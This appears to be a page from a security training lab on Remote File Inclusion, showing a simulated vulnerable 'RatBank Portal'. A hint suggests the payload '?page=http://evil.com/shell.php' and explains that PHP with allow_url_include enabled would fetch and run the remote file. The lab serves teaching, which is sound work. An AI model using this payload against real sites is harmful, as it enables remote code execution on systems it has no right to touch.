RFI Lab 1 - Basic Remote File Inclusion


RatBank Portal


About Us

RatBank — secure banking since 1337.


Current page parameter: about

Hint (click to reveal)

The page parameter is passed directly to the include function. Try replacing it with a full URL: ?page=http://evil.com/shell.php. In this simulation, any external URL triggers the RFI flag. In a real scenario with allow_url_include=On, PHP would fetch and execute the remote file.


Back to RFI Labs